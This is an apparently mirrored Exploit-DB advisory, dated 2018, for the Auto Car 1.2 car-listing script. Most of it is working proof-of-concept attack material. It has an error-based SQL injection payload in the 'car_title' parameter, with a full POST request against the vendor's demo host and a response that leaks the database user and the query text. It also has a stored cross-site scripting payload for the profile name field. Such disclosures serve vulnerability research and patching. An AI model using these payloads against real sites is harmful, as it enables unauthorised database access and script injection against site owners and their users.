Auto Car 1.2 – ‘car_title’ SQL Injection / Cross-Site Scripting

  • 作者: L0RD
    日期: 2018-05-22
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/44699/
  • # Exploit Title: Auto car 1.2 - 'car_title' SQL Injection / Cross-Site Scripting
    # Date: 2018-05-22
    # Exploit Author: Borna nematzadeh (L0RD)
    # Vendor Homepage: https://codecanyon.net/item/auto-car-car-listing-script/19221368?s_rank=1159
    # Version: 1.2
    # Tested on: Win 10
    
    # POC 1: SQLi:
    
    # Parameter: car_title
    # Type: Error based
    # Payload: 1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
    # test: http://target/scripts/autocar_preview/
    
    # Request:
    
    POST /scripts/autocar_preview/search-cars HTTP/1.1
    Host: kamleshyadav.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
    Gecko/20100101 Firefox/61.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://kamleshyadav.com/scripts/autocar_preview/
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 58
    Connection: keep-alive
    Upgrade-Insecure-Requests: 1
    
    car_title=1' and extractvalue(1,Concat(0x3a,user(),0x3a))#
    
    # Response:
    
    HTTP/1.1 500 Internal Server Error
    Server: nginx/1.12.2
    Date: Tue, 22 May 2018 14:36:47 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 1371
    Connection: keep-alive
    
    <h1>A Database Error Occurred</h1>
    <p>Error Number: 1105</p><p>XPATH syntax error:
    ':kamleshy_event@localhost:'</p><p>SELECT
    *
    FROM `autocar_car_details`
    WHERE `car_status` = 1 AND `car_title` LIKE '%1' and
    extractvalue(1,Concat(0x3a,user(),0x3a))#%'</p>
    
    # POC 2: Cross site scripting:
    
    1) Create your account and navigate to "edit profile"
    2) Put this payload in "name" and update your profile:
    <script>alert('xss')</script>
    3) You will have an alert box in your page .